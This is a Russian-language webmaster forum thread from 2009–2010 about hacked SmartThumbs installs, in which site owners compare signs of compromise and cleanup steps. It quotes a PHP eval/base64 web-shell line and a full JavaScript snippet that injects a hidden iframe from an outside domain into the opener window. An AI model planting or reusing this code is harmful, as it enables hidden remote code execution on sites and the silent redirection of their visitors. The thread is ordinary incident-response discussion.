Реклама на сайте Advertise with us

SmartThumbs HACKED again

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 14.06.05
Сообщения: 345
Рейтинг: 171

Ссылка на сообщениеДобавлено: 09/10/09 в 16:55       Ответить с цитатойцитата 

Soft-Com: я сделал проще, удалил каталог gals icon_smile.gif, похоже скрипт глюкал при названии папки p2.php_files, теперь он ничего не пишет и тем не менее @eval(base64_decode($_POST[qxp]));//'; появляется стабильно.

Последний раз редактировалось: MadDok (09/10/09 в 17:02), всего редактировалось 1 раз

1
 



С нами с 28.06.04
Сообщения: 221
Рейтинг: 187

Ссылка на сообщениеДобавлено: 09/10/09 в 16:59       Ответить с цитатойцитата 

на нескольких доменах на разных серверах нашел пустых юзеров. удалил, пропатчился. в variables.php ничего левого нету, flie check везде на все сказал ОК. но в /tmp на обоих серверах есть много пустых *ses.tmp
доктор, я здоров или таки поломали? поубивать все эти *ses.tmp и спать спокойно?

http://www.cjmaniacs.com - 34 ниши, 200 сиджей. Потрейдим?

0
 

нет судьбы

С нами с 27.03.03
Сообщения: 4427
Рейтинг: 4204


Передовик Master-X (16.07.2011) Передовик Master-X (16.10.2011) Передовик Master-X (01.11.2011) Передовик Master-X (16.11.2011) Передовик Master-X (01.01.2012) Ветеран трепа Master-X (16.02.2012)
Ссылка на сообщениеДобавлено: 09/10/09 в 19:43       Ответить с цитатойцитата 

Почти на 90% сайтов был пустой юзер, но кроме него ничего подозрительного не нашел..
Где именно этот /tmp? В корне самого сервака?

0
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 09/10/09 в 19:49       Ответить с цитатойцитата 



это директория в корне сервера
обычно юзеры, которые даются хостером - не имеют к ней доступа. если есть рут на сервере или свой админ - можно увидеть.

файлы в этой директории - сессии залогиненных веб-юзеров, например, вебмастеров, залогиненных в тгп-скрипт или ваши собственные в трейд-скриптах.
поэтому они появляются.

сами файлы с эксплойтом выглядят как
ses.tmp
ases.tmp
а вот те файлы, которые начинаются на ses и выглядят как ses_4534584583454.tmp - это и есть сессии залогиненных юзеров.
если их стереть - просто юзерам придется перелогиниться. в этом нет ничего критического по сути.

0
 

нет судьбы

С нами с 27.03.03
Сообщения: 4427
Рейтинг: 4204


Передовик Master-X (16.07.2011) Передовик Master-X (16.10.2011) Передовик Master-X (01.11.2011) Передовик Master-X (16.11.2011) Передовик Master-X (01.01.2012) Ветеран трепа Master-X (16.02.2012)
Ссылка на сообщениеДобавлено: 09/10/09 в 19:55       Ответить с цитатойцитата 

Странно, но даже под рутом не смог удалить icon_sad.gif
ses.tmp
ases.tmp
..
В них какойто зазенденный код.

Еще есть куча в /tmp нулевого размера файлов
bses.tmp
cses.tmp
dses.tmp
...
xses.tmp
yses.tmp
это что такое?

2
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 09/10/09 в 22:50       Ответить с цитатойцитата 

это всё код трояна, который инклюдится при выполнении даже любого смартового скрипта - удаляй

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

2
 

нет судьбы

С нами с 27.03.03
Сообщения: 4427
Рейтинг: 4204


Передовик Master-X (16.07.2011) Передовик Master-X (16.10.2011) Передовик Master-X (01.11.2011) Передовик Master-X (16.11.2011) Передовик Master-X (01.01.2012) Ветеран трепа Master-X (16.02.2012)
Ссылка на сообщениеДобавлено: 09/10/09 в 23:29       Ответить с цитатойцитата 

не удаляются, суки...

0
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 10/10/09 в 03:51       Ответить с цитатойцитата 


вообще это довольно дико, если под рутом они не удаляются.
у тебя точно полноценный дедик? может это джейл какой-нибудь? тогда надо пинать суппорт хостера

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 10/10/09 в 07:08       Ответить с цитатойцитата 

а можно это как-то увидеть?

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 28.06.04
Сообщения: 221
Рейтинг: 187

Ссылка на сообщениеДобавлено: 10/10/09 в 08:44       Ответить с цитатойцитата 

У меня тоже не удалялись под рутом. Саппорт вебазиллы сказал: "Данные файлы удалять не стоит, это является временным средством защиты от взлома"
Удалять пытался уже после того как пропатчил смарты. Мож так и должно быть...

http://www.cjmaniacs.com - 34 ниши, 200 сиджей. Потрейдим?

5
 

нет судьбы

С нами с 27.03.03
Сообщения: 4427
Рейтинг: 4204


Передовик Master-X (16.07.2011) Передовик Master-X (16.10.2011) Передовик Master-X (01.11.2011) Передовик Master-X (16.11.2011) Передовик Master-X (01.01.2012) Ветеран трепа Master-X (16.02.2012)
Ссылка на сообщениеДобавлено: 10/10/09 в 11:45       Ответить с цитатойцитата 

fihorn! Я уверен, что у меня дедики!
Сапорт сказал примерно то же самое, что и Darkestу..

0
 



С нами с 06.10.05
Сообщения: 224
Рейтинг: 186

Ссылка на сообщениеДобавлено: 10/10/09 в 21:04       Ответить с цитатойцитата 

toge nashel u sebya

0
 



С нами с 09.10.07
Сообщения: 433
Рейтинг: 321

Ссылка на сообщениеДобавлено: 11/10/09 в 00:26       Ответить с цитатойцитата 

Админы могли сами создать пустые файлы, и повесить аттрибут immutable -- чтобы туда нельзя было записать код эксплойта. (У такого аттрибута приоритет выше чем у прав пользователей, хотя по идее рут должен их сносить). Или поставили на них права 000

5
 



С нами с 14.06.05
Сообщения: 345
Рейтинг: 171

Ссылка на сообщениеДобавлено: 12/10/09 в 08:59       Ответить с цитатойцитата 

yo: ну что, ты какнибудь сумел исправить эту проблему?

0
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 12/10/09 в 10:27       Ответить с цитатойцитата 

ну если вы под рутом не можете удалить файлы - то, скорее всего, нужно обратиться к суппорту хостера. если это вебазилла - то, наверное, ребята тоже участвуют в решении проблемы и знают, почему вдруг файлы стали неудаляемые.

вот Alex AWM написал же про пустые файлы и 000. это старая проверенная техника, работает.

0
 



С нами с 29.02.04
Сообщения: 1118
Рейтинг: 883

Ссылка на сообщениеДобавлено: 16/01/10 в 13:02       Ответить с цитатойцитата 

Soft-Com писал:
пока еще не разобрался, но после взлома на сервере присутвуют 2 части скрипта:
1. в /tmp/ - судя по всему скрипт редиректа посетителя на урл http://itrxx.com/fr.php

Кто трейдит с DonKinky и его подругой Webmiss Lizzet, проверьте трейды с ними
У них точно такой же редирект вставляется при первом клике:
Код:
<body oncontextmenu='return false'><script>if(window.opener&&!window.opener.closed){var ifr=window.opener.document.createElement('iframe');ifr.src='http://itrxx.com/fr.php';ifr.style.visibility='hidden';ifr.style.position='absolute';window.opener.document.body.appendChild(ifr);}</script><script>window.name='qwnew';</script><script>window.location.reload();</script><meta http-equiv='refresh' content='1'>

То есть, на их сайтах (пример http://www.realitypictures.net/) кликаем - открывается окно с этим кодом. Оно, судя по коду, вставляет скрытый фрейм в opener - то есть в окно, которое открыло линк, то есть в сам сайт DonKinky, а затем себя перегружает (открывает галлеру/трейд). У меня нет сейчас аськи до понедельника, но если кто может, посодействуйте, чтобы они убрали это г....;-)

5
 

На пенсии

С нами с 09.05.07
Сообщения: 982
Рейтинг: 411

Ссылка на сообщениеДобавлено: 08/03/10 в 10:45       Ответить с цитатойцитата 

у меня в thumbs есть странные файлы типа kgjsdkjsdjk.jpg но фишка в том что они открываются как картинки и это нормальные тумбы, но название отличается от других тумб в директории и так почти в каждой директории, это нормально?

Все пиздой накрылось :)

0
 



С нами с 15.12.05
Сообщения: 287
Рейтинг: 293

Ссылка на сообщениеДобавлено: 08/03/10 в 13:20       Ответить с цитатойцитата 

нормально, названия тумб рандомом генерятся, мало ли что может получиться )

0
 



С нами с 12.12.06
Сообщения: 871
Рейтинг: 381

Ссылка на сообщениеДобавлено: 27/06/10 в 09:10       Ответить с цитатойцитата 

а может и повториться icon_smile.gif

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »